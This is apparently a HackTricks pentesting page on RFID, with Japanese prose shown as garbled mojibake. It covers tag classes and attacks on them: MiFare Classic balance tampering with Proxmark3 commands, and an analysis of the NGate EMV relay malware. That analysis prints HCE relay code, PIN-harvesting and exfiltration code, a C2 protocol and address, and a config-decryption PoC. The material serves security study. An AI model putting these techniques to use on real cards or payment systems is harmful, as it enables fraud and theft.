Pentesting RFID
Tip
AWSãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training AWS Red Team Expert (ARTE)
GCPãããã³ã°ãåŠã³ãå®è·µããïŒHackTricks Training GCP Red Team Expert (GRTE)
Azureãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksããµããŒããã
- ãµãã¹ã¯ãªãã·ã§ã³ãã©ã³ã確èªããŠãã ããïŒ
- **ð¬ Discordã°ã«ãŒããŸãã¯ãã¬ã°ã©ã ã°ã«ãŒãã«åå ããããTwitter ðŠ @hacktricks_liveããã©ããŒããŠãã ããã
- HackTricksããã³HackTricks Cloudã®GitHubãªããžããªã«PRãæåºããŠãããã³ã°ããªãã¯ãå ±æããŠãã ããã
ã¯ããã«
Radio Frequency Identification (RFID) ã¯æãäžè¬çãªçè·é¢ç¡ç·ãœãªã¥ãŒã·ã§ã³ã§ããéåžžããšã³ãã£ãã£ãèå¥ããæ å ±ãæ ŒçŽã»éä¿¡ããããã«äœ¿ãããŸãã
RFIDã¿ã°ã¯ãåã蟌ã¿ããããªãŒãªã©ã®**ç¬èªã®é»æºãæã€ïŒactiveïŒãã®ãšãåä¿¡ãã黿³¢ããèªå°ããã黿µã§é»åãåŸãïŒpassiveïŒ**ãã®ããããŸãã
ã¯ã©ã¹
EPCglobal 㯠RFID ã¿ã°ã6ã€ã®ã«ããŽãªã«åé¡ããŸããåã«ããŽãªã®ã¿ã°ã¯åã®ã«ããŽãªã«ãããã¹ãŠã®æ©èœãåããŠãããäžäœäºææ§ããããŸãã
- Class 0 ã¿ã°ã¯ passive 㪠UHF 垯ã§åäœããã¿ã°ã§ãããã³ããŒã補é å·¥å Žã§ preprograms ããŸãããã®ãããã¡ã¢ãªã«ä¿åãããæ å ±ã 倿Žã§ããŸããã
- Class 1 ã¿ã°ã¯ HF 垯ã§ãåäœã§ããŸããå ããŠã補é åŸã« äžåºŠã ãæžã蟌ã¿å¯èœïŒwrite onceïŒ ã§ããå€ãã® Class 1 ã¿ã°ã¯åãåã£ãã³ãã³ãã® cyclic redundancy checksïŒCRCïŒ ãåŠçã§ããŸããCRC ã¯ãšã©ãŒæ€åºã®ããã«ã³ãã³ãæ«å°Ÿã«ä»å ãããæ°ãã€ãã§ãã
- Class 2 ã¿ã°ã¯ è€æ°åæžã蟌ã¿å¯èœ ã§ãã
- Class 3 ã¿ã°ã¯æž©åºŠãã¿ã°ã®åäœãªã©ã®ç°å¢ãã©ã¡ãŒã¿ãèšé²ã§ãã çµã¿èŸŒã¿ã»ã³ãµãŒ ãå«ãããšãã§ããŸãããããã®ã¿ã°ã¯ semi-passive ã§ãçµ±åããããªãŒãªã©ã® 黿ºãæã£ãŠãã ãã®ã®ãä»ã®ã¿ã°ããªãŒããŒãšã®ç¡ç· éä¿¡ãèªçºçã«éå§ããããšã¯ã§ããŸããã
- Class 4 ã¿ã°ã¯åã¯ã©ã¹ã®ä»ã¿ã°ãšéä¿¡ãéå§ã§ãããããactive tags ã«ãªããŸãã
- Class 5 ã¿ã°ã¯ä»ã®ã¿ã°ã« é»åãäŸçµŠããåè¿°ã®ãã¹ãŠã®ã¿ã°ã¯ã©ã¹ãšéä¿¡ ã§ããŸããClass 5 ã¿ã°ã¯ RFID readers ãšããŠãæ©èœããŸãã
RFID ã¿ã°ã«ä¿åãããæ å ±
RFID ã¿ã°ã®ã¡ã¢ãªã¯éåžžãæ¬¡ã®4çš®é¡ã®ããŒã¿ãæ ŒçŽããŸãïŒãšã³ãã£ãã£ãèå¥ãã identification dataïŒéè¡å£åº§ãªã©ã®ãŠãŒã¶ãŒå®çŸ©ãã£ãŒã«ããå«ãïŒïŒãšã³ãã£ãã£ã«é¢ãã è£è¶³æ å ±ïŒsupplementary dataïŒïŒã¿ã°å éšã® configuration ã«äœ¿ããã control dataïŒããã³ã¿ã°ã®äžæèå¥åïŒUIDïŒã補é ãã¿ã€ãããã³ããŒã«é¢ããæ å ±ãå«ã manufacturer dataãæåã®2çš®é¡ã®ããŒã¿ã¯åžè²©ã¿ã°ã®ãã¹ãŠã«èŠãããŸãããåŸã®2çš®é¡ã¯ãã³ããŒã«ãã£ãŠç°ãªãããšããããŸãã
ISO æšæºã¯ã¿ã°ãå±ãã ãªããžã§ã¯ãã®çš®é¡ ã瀺ãã³ãŒãã§ãã Application Family IdentifierïŒAFIïŒã®å€ãèŠå®ããŠããŸããISO ã«ãã£ãŠèŠå®ãããããäžã€ã®éèŠãªã¬ãžã¹ã¿ã¯ Data Storage Format IdentifierïŒDSFIDïŒã§ããŠãŒã¶ããŒã¿ã® è«ççãªæ§æ ãå®çŸ©ããŸãã
ã»ãšãã©ã® RFID ã»ãã¥ãªãã£å¶åŸ¡ ã¯åãŠãŒã¶ã¡ã¢ãªãããã¯ã AFIã»DSFID å€ãå«ãç¹å¥ã¬ãžã¹ã¿ãžã® èªã¿åãïŒæžãèŸŒã¿æäœãå¶éãã æ©æ§ãæã¡ãŸãããããã® ããã¯æ©æ§ ã¯å¶åŸ¡ã¡ã¢ãªã«ä¿åãããããŒã¿ãçšãããã³ããŒã«ããåæã®ããã©ã«ããã¹ã¯ãŒããèšå®ãããŠããŸãããã¿ã°ææè ã ã«ã¹ã¿ã ãã¹ã¯ãŒããèšå® ã§ããããã«ãªã£ãŠããŸãã
äœåšæ³¢ & é«åšæ³¢ã¿ã°ã®æ¯èŒ
.png)
Low-Frequency RFID Tags (125kHz)
Low-frequency tags ã¯é«ãã»ãã¥ãªãã£ãå¿ èŠãšããªãã·ã¹ãã ã§ãã䜿ãããŸãïŒå»ºç©ã¢ã¯ã»ã¹ãã€ã³ã¿ãŒãã³ããŒããžã ã®äŒå¡ã«ãŒããªã©ãé«ãã¬ã³ãžã®ãããææé§è»å Žã§ã®äœ¿çšã«äŸ¿å©ã§ããã©ã€ããŒã¯ãªãŒããŒã«ã«ãŒããè¿ã¥ããå¿ èŠããªããé ãããã§ãããªã¬ãŒãããŸããäžæ¹ã§äœåšæ³¢ã¿ã°ã¯éåžžã«åå§çã§ãããŒã¿è»¢éé床ãäœãã§ãããã®ããæ®é«ç®¡çãæå·åã®ãããªè€éãªåæ¹åããŒã¿è»¢éãå®è£ ããããšã¯äžå¯èœã§ããäœåšæ³¢ã¿ã°ã¯çãIDã®ã¿ãèªèšŒææ®µãªãã«éä¿¡ããŸãã
ãããã®ããã€ã¹ã¯ passive RFID æè¡ã«äŸåãã30 kHzïœ300 kHz ã®ç¯å²ã§åäœããŸãããé垞㯠125 kHzïœ134 kHz ã䜿çšããŸãïŒ
- é·è·é¢ â äœåšæ³¢ã¯ã¬ã³ãžãé·ããªããŸããäžéšã® EM-Marin ã HID ãªãŒããŒã¯æå€§1ã¡ãŒãã«ã®è·é¢ã§åäœããŸãããããã¯é§è»å Žã§ãã䜿ãããŸãã
- åå§çãªãããã³ã« â äœããŒã¿è»¢éé床ã®ããããããã®ã¿ã°ã¯çãIDã®ã¿ãéä¿¡ã§ããŸããã»ãšãã©ã®å ŽåãããŒã¿ã¯èªèšŒãããäœã®ä¿è·ããããŸãããã«ãŒãããªãŒããŒã®ç¯å²ã«å ¥ããšãã IDãéä¿¡ãå§ããŸãã
- äœã»ãã¥ãªã㣠â ãã®çš®ã®ã«ãŒãã¯ç°¡åã«ã³ããŒã§ãããããã³ã«ã®åå§æ§ã®ããä»äººã®ãã±ããããã§ãèªã¿åãããããšããããŸãã
人æ°ã®125 kHzãããã³ã«ïŒ
- EM-Marin â EM4100, EM4102ãCISã§æã人æ°ã®ãããããã³ã«ãåçŽããšå®å®æ§ã®ããçŽ1ã¡ãŒãã«é¢ããå Žæããã§ãèªã¿åããŸãã
- HID Prox II â HID Global ã«ããäœåšæ³¢ãããã³ã«ã西åŽè«žåœã§ããäžè¬çã§ããããè€éã§ããã®ãããã³ã«åãã®ã«ãŒããšãªãŒããŒã¯æ¯èŒçé«äŸ¡ã§ãã
- Indala â Motorola ã«ãã£ãŠå°å ¥ããããã®åŸ HID ã«è²·åãããéåžžã«å€ãäœåšæ³¢ãããã³ã«ãåè¿°ã®2ã€ãšæ¯ã¹ãŠå©çšãæžã£ãŠããŠãããããçŸå Žã§ééããå¯èœæ§ã¯äœããªã£ãŠããŸãã
å®éã«ã¯äœåšæ³¢ãããã³ã«ã¯ãã£ãšå€æ°ååšããŸãããããç©çå±€ã§åãå€èª¿ã䜿ã£ãŠãããããã«æãããã®ã®ããªãšãŒã·ã§ã³ãšèŠãªããŸãã
æ»æ
You can attack these Tags with the Flipper Zero:
High-Frequency RFID Tags (13.56 MHz)
High-frequency tags ã¯æå·ãåæ¹åã®å€§éããŒã¿è»¢éãèªèšŒãªã©ãããè€éãªãªãŒããŒâã¿ã°çžäºäœçšãå¿
èŠãªå Žåã«äœ¿ãããŸãã
éåžžãéè¡ã«ãŒããå
Œ
±äº€éããã®ä»ã®ã»ãã¥ã¢ãªãã¹ã§èŠãããŸãã
High-frequency 13.56 MHz tags are a set of standards and protocolsãäžè¬ã«ã¯ NFC ãšåŒã°ããããšãå€ãã§ãããå¿ ãããæ£ç¢ºã§ã¯ãããŸãããç©çã»è«çã¬ãã«ã§äœ¿ãããåºæ¬çãªãããã³ã«ã»ãã㯠ISO 14443 ã§ããé«ã¬ãã«ã®ãããã³ã«ãä»£æ¿æšæºïŒISO 19092 ã®ãããªïŒã¯ããã«åºã¥ããŠããŸããå€ãã®äººã¯ãã®æè¡ã 13.56 MHz 垯ã§åäœããããã€ã¹ã®ç·ç§°ãšã㊠Near Field Communication (NFC) ãšåŒã³ãŸãã
.png)
ç°¡åã«èšãã°ãNFC ã®ã¢ãŒããã¯ãã£ã¯æ¬¡ã®ããã«æ©èœããŸãïŒéä¿¡ãããã³ã«ã¯ã«ãŒãã補é ããäŒç€Ÿãéžæããäœã¬ãã«ã® ISO 14443 ã«åºã¥ããŠå®è£ ãããŸããäŸãã°ãNXP ã¯ç¬èªã®é«ã¬ãã«éä¿¡ãããã³ã« Mifare ãèæ¡ããŸããããããäžäœã¬ãã«ã§ã¯ Mifare ã«ãŒã㯠ISO 14443-A æšæºã«åºã¥ããŠããŸãã
Flipper ã¯äœã¬ãã«ã® ISO 14443 ãããã³ã«ã ãã§ãªããMifare Ultralight ã®ããŒã¿è»¢éãããã³ã«ã EMV ã«å¯ŸããŠãçžäºäœçšã§ããŸããMifare Classic ãš NFC NDEF ã®ãµããŒã远å ã«çŸåšåãçµãã§ããŸããNFC ãæ§æãããããã³ã«ãæšæºã®è©³çŽ°ãªæ€èšã¯å¥èšäºã«å€ããåŸã§æ²èŒããäºå®ã§ãã
ISO 14443-A ã«åºã¥ããã¹ãŠã® high-frequency ã«ãŒãã¯äžæã®ããã ID ãæã¡ãŸããããã¯ã«ãŒãã®ã·ãªã¢ã«çªå·ãšããŠæ©èœãããããã¯ãŒã¯ã«ãŒãã® MAC ã¢ãã¬ã¹ã®ãããªãã®ã§ããéåžžãUID ã¯4ãŸãã¯7ãã€ãé·ã§ãããçšã« æå€§10ãã€ã ã«éããããšããããŸããUID ã¯ç§å¯ã§ã¯ãªãç°¡åã«èªã¿åããæã«ã¯ã«ãŒãèªäœã«å°å·ãããŠããããšãããããŸãã
å€ãã®ã¢ã¯ã»ã¹å¶åŸ¡ã·ã¹ãã 㯠UID ã䜿ã£ãŠ èªèšŒãã¢ã¯ã»ã¹èš±å¯ ãè¡ã£ãŠããŸããæã«ã¯ã¿ã°ãæå·ããµããŒãããŠããå Žåã§ã UID ã®ã¿ã§èªèšŒãè¡ãããŸãããã®ãããª èª€çš ã«ãããã»ãã¥ãªãã£ã®èгç¹ã§ãããã¯æã㪠125 kHz ã«ãŒã ãšåçšåºŠã®ã¬ãã«ã«èœãšãããŸããä»®æ³ã«ãŒãïŒäŸïŒApple PayïŒã¯åç UID ã䜿çšããæ¯æãã¢ããªã§ãã¢ãéããŠããŸãããšãç¡ãããã«ããŠããŸãã
- çããªãŒã â high-frequency ã«ãŒãã¯ãªãŒããŒã«è¿ã¥ããå¿ èŠãããããèšèšãããŠããŸããããã¯äžæ£ãªçžäºäœçšããã«ãŒããä¿è·ããã®ã«ã圹ç«ã¡ãŸããç§ãã¡ãéæããæå€§èªã¿åãè·é¢ã¯çŽ15cmã§ãã«ã¹ã¿ã ã¡ã€ãã®é«ã¬ã³ãžãªãŒããŒã䜿çšããå Žåã§ããã
- é«åºŠãªãããã³ã« â æå€§424 kbps ã®ããŒã¿è»¢éé床ã«ãããåæ¹åã®å®å šãªããŒã¿è»¢éã䌎ãè€éãªãããã³ã«ãå¯èœã§ããããã«ããæå·åãããŒã¿è»¢éãªã©ã å¯èœ ã«ãªããŸãã
- é«ãã»ãã¥ãªã㣠â high-frequency ã®ã³ã³ã¿ã¯ãã¬ã¹ã«ãŒãã¯ã¹ããŒãã«ãŒãã«å£ããŸãããAES ã®ãããªåŒ·åãªæå·ã¢ã«ãŽãªãºã ãå ¬é鵿å·ãå®è£ ããã«ãŒããååšããŸãã
æ»æ
You can attack these Tags with the Flipper Zero:
Or using the proxmark:
MiFare Classic offline stored-value tampering (broken Crypto1)
ã·ã¹ãã ãæ®é«ã MiFare Classic ã«ãŒãäžã«çŽæ¥ä¿åããŠããå ŽåãClassic ã NXP ã®å»æ¢æžã¿ Cipher ã§ãã Crypto1 ã䜿çšããŠããããããã°ãã°æ¹ãããå¯èœã§ããCrypto1 ã¯æ°å¹Žåã«ç ŽãããŠãããsector keys ã®å埩ãã«ãŒãã¡ã¢ãªã®å®å šãªèªã¿æžããäžè¬çãªããŒããŠã§ã¢ïŒäŸïŒProxmark3ïŒã§å¯èœã«ãªã£ãŠããŸãã
End-to-end workflow (abstracted):
- å ã®ã«ãŒãããã³ãããŠéµãå埩ãã
# Attempt all built-in Classic key recovery attacks and dump the card
hf mf autopwn
ããã«ããéåžžãsector keys (A/B) ã埩å ããclient dumps folder ã« full-card dump ãçæããŸãã
- value/integrity fields ãç¹å®ããŠçè§£ãã
- ãªãªãžãã«ã«ãŒãã«å¯ŸããŠæ£åœãª top-ups ãè¡ããè€æ°ã® dumpsïŒbefore/afterïŒãååŸããã
- 2ã€ã® dumps ã® diff ãåããbalance ã integrity fields ã衚ãå€åãã blocks/bytes ãç¹å®ããã
- å€ãã® Classic å±éã§ã¯ããã€ãã£ãã®ãvalue blockããšã³ã³ãŒãã£ã³ã°ã䜿çšããããç¬èªã® checksums ãå®è£ ããŠããŸãïŒäŸ: XOR of the balance with another field and a constantïŒãbalance ã倿Žããããintegrity bytes ãåèšç®ããå šãŠã® duplicated/complemented fields ãæŽåããããšã確èªããã
- 倿Žãã dump ãæžã蟌ã¿å¯èœãª âChinese magicâ Classic tag ã«æžã蟌ã
# Load a modified binary dump onto a UID-changeable Classic tag
hf mf cload -f modified.bin
- å ã® UID ãè€è£œããŠç«¯æ«ãã«ãŒããèªèããããã«ãã
# Set the UID on a UID-changeable tag (gen1a/gen2 magic)
hf mf csetuid -u <original_uid>
- 端æ«ã§ã®äœ¿çš
ã«ãŒãäžã®æ®é«ãš UID ãä¿¡çšãããªãŒããŒã¯ãæ¹å€ãããã«ãŒããåãå ¥ããŸãããã£ãŒã«ã芳å¯ã§ã¯ãå€ãã®å°å ¥äŸã§ãã£ãŒã«ãå¹ ã«åºã¥ããŠæ®é«ãäžéããŠããããšã瀺ãããŠããŸãïŒäŸïŒ16-bit åºå®å°æ°ç¹ïŒã
Notes
- If the system uses native Classic value blocks, remember the format: value (4B) + ~value (4B) + value (4B) + block address + ~address. All parts must match.
- For custom formats with simple checksums, differential analysis is the fastest way to derive the integrity function without reversing firmware.
- Only UID-changeable tags (âChinese magicâ gen1a/gen2) allow writing block 0/UID. Normal Classic cards have read-only UIDs.
For hands-on Proxmark3 commands, see:
æºåž¯å HID MaxiProx 125 kHz Mobile Cloner ã®äœæ
red-team engagements äžã« HID Prox® ãããžãåéããããã« é·è·é¢ãããããªãŒé§å ã®ãœãªã¥ãŒã·ã§ã³ãå¿ èŠãªå Žåãå£ä»ãã® HID MaxiProx 5375 ãªãŒããŒãããã¯ããã¯ã«åãŸãèªç«åã¯ããŒã³æ©ã«æ¹é ã§ããŸãããã«ã®æ©æ¢°ã»é»æ°ã®æé ã¯ä»¥äžãåç §ããŠãã ããïŒ
Android ReaderâHCE Emitter ãä»ãã NFC/EMV ãªã¬ãŒ
Classic EMV ãªã¬ãŒã¯ 2 å°ã® Android ããã€ã¹ã§å®è£ ã§ããŸãïŒå®ã«ãŒãããã©ã€ãã® APDUs ãš PIN ãææãã被害è åŽã® readerããããŠç«¯æ«äžã§ APDUs ãäžæµã«è»¢éããæ»æè åŽã® HCE emitterãè§£æããã NGate kit ã¯æ£èŠã® Android NFC APIs ãšã·ã³ãã«ãªãã¬ãŒã åããã TCP C2 ãæªçšããŠããªã¢ã«ã¿ã€ã ã® ATM cash-outs ããªãŒã±ã¹ãã¬ãŒã·ã§ã³ããŸãã
Key building blocks
- Reader-mode app (victim): uses NFC reader APIs to parse EMV (PAN/expiry/AIDs), displays scheme by AID, asks for PIN and exfiltrates immediately.
- Emitter-mode app (ATM side): implements Host Card Emulation (HCE) with
android:requireDeviceUnlock="false"and a payment AID;processCommandApdu()forwards APDUs to C2 and returns minimal response. - Wire protocol: length-prefixed frames, periodic keepalive; optionally TLS.
Android surface (Manifest/HCE)
<uses-permission android:name="android.permission.NFC"/>
<uses-permission android:name="android.permission.INTERNET"/>
<service android:name=".nfc.hce.ApduService"
android:permission="android.permission.BIND_NFC_SERVICE"
android:exported="true">
<intent-filter>
<action android:name="android.nfc.cardemulation.action.HOST_APDU_SERVICE"/>
<category android:name="android.intent.category.DEFAULT"/>
</intent-filter>
<meta-data android:name="android.nfc.cardemulation.host_apdu_service"
android:resource="@xml/hce"/>
</service>
hce.xml ã®äŸ (unlockãªã + payment AIDãªã)
<host-apdu-service android:requireDeviceUnlock="false"
android:description="relay">
<aid-group android:category="other">
<aid-filter android:name="F001020304050607"/>
</aid-group>
<aid-group android:category="payment">
<aid-filter android:name="F001020304050607"/>
</aid-group>
</host-apdu-service>
ééãªã¬ãŒãšã³ããã€ã³ã (HCE)
@Override public byte[] processCommandApdu(byte[] apdu, Bundle extras) {
Log.d("ApduService", "APDU-IN: " + toHex(apdu));
bus.forward(apdu); // send upstream to C2/reader
return new byte[0]; // empty response, pure relay endpoint
}
AIDã«ããEMVã¹ããŒã æšå®ïŒäŸïŒ
- A000000004 â Mastercard
- A000000003 â Visa
- A000000658 â MIR
- A000000333 â UnionPay
PIN harvesting pattern (victim UI)
// Custom keypad publishes when required length (e.g., 4) is reached
if (pin.length() == 4) postDelayed(() -> bus.publish(pin), 100L);
// Network immediately exfiltrates via dedicated opcode
send(OP_PIN_REQ, pin.getBytes(StandardCharsets.UTF_8));
ãã¬ãŒã åããã C2ïŒcleartext ã®äŸïŒ
- ClientâServer: int32 len | int32 opcode | body
- ServerâClient: int32 len | body (opcode inside payload)
- ããã£ã > ~100 MiB ã®å Žåã¯æåŠ; keepalive ã¯çŽ7s (PING)
// send
out.writeInt(body.length); out.writeInt(op); out.write(body); out.flush();
// recv
int len = in.readInt(); byte[] body = new byte[len]; in.readFully(body);
èšå®ã®é èœ: èšŒææžç±æ¥ã® XOR
- Native lib 㯠app signing certificate (DER) ã® SHAâ256 ãçšã㊠32 ãã€ãã®ããŒãå°åºããã
- C2 config 㯠ASCIIâhex ã§ assets ã«æ ŒçŽãããŠããïŒäŸã
assets/____ïŒãhex-decoded ããã32 ãã€ãããšã«ç¹°ãè¿ãããããŒã§ XOR ããã:
for (size_t i = 0; i < len; i++) pt[i] = ct[i] ^ key[i & 31];
config ã decrypt ãããªãã©ã€ã³ PoC
# Extract signing cert digest
apksigner verify --print-certs sample.apk
# "Signer #1 certificate SHA-256 digest: <hex>"
import pathlib
key = bytes.fromhex("<sha256_of_signing_cert>")
ct = bytes.fromhex(pathlib.Path("/path/to/assets/____").read_text().strip())
pt = bytes(c ^ key[i % 32] for i, c in enumerate(ct))
print(pt.decode("utf-8", errors="replace"))
Sample decrypted fields: host, port, sharedToken, tls, mode, reader, uniqueID, ttd.
ãªã¬ãŒãã§ãŒã³ïŒãšã³ãããŒãšã³ãïŒ
- 被害è ãAPKãã€ã³ã¹ããŒã«ããŠã¢ããªãéã â native initãassetsããconfigã埩å·ããã
- ã¢ããªã¯framed TCPã䜿ã£ãŠC2ïŒäŸ:
91.84.97.13:5653ïŒã«æ¥ç¶ããïŒkeepaliveã¯çŽ7sã - 被害è ãã«ãŒããã¿ãã â readerãPAN/expiry/AIDsãæœåºããŠCARD_DISCOVEREDãéä¿¡ããã
- 被害è ãPINãå ¥å â keypadãPIN_REQã§å ¬éããã³å€éšéä¿¡ããïŒãµãŒãã¯UI衚瀺çšã«ã®ã¿VALID/INVALIDã§å¿çããã
- 端æ«äžã®æ»æè ããã€ã¹ãHCE emitterãå®è¡ããAPDUsãATMãžãªã¬ãŒããŠcash-outãè¡ãã
References
- https://blog.flipperzero.one/rfid/
- Letâs Clone a Cloner â Part 3 (TrustedSec)
- NXP statement on MIFARE Classic Crypto1
- MIFARE security overview (Wikipedia)
- NFC card vulnerability exploitation in KioSoft Stored Value (SEC Consult)
- Analysis of NGate malware campaign (CERT-PL)
- Android apksigner â verify/print-certs
- Android Host Card Emulation (HCE) overview
Tip
AWSãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training AWS Red Team Expert (ARTE)
GCPãããã³ã°ãåŠã³ãå®è·µããïŒHackTricks Training GCP Red Team Expert (GRTE)
Azureãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksããµããŒããã
- ãµãã¹ã¯ãªãã·ã§ã³ãã©ã³ã確èªããŠãã ããïŒ
- **ð¬ Discordã°ã«ãŒããŸãã¯ãã¬ã°ã©ã ã°ã«ãŒãã«åå ããããTwitter ðŠ @hacktricks_liveããã©ããŒããŠãã ããã
- HackTricksããã³HackTricks Cloudã®GitHubãªããžããªã«PRãæåºããŠãããã³ã°ããªãã¯ãå ±æããŠãã ããã


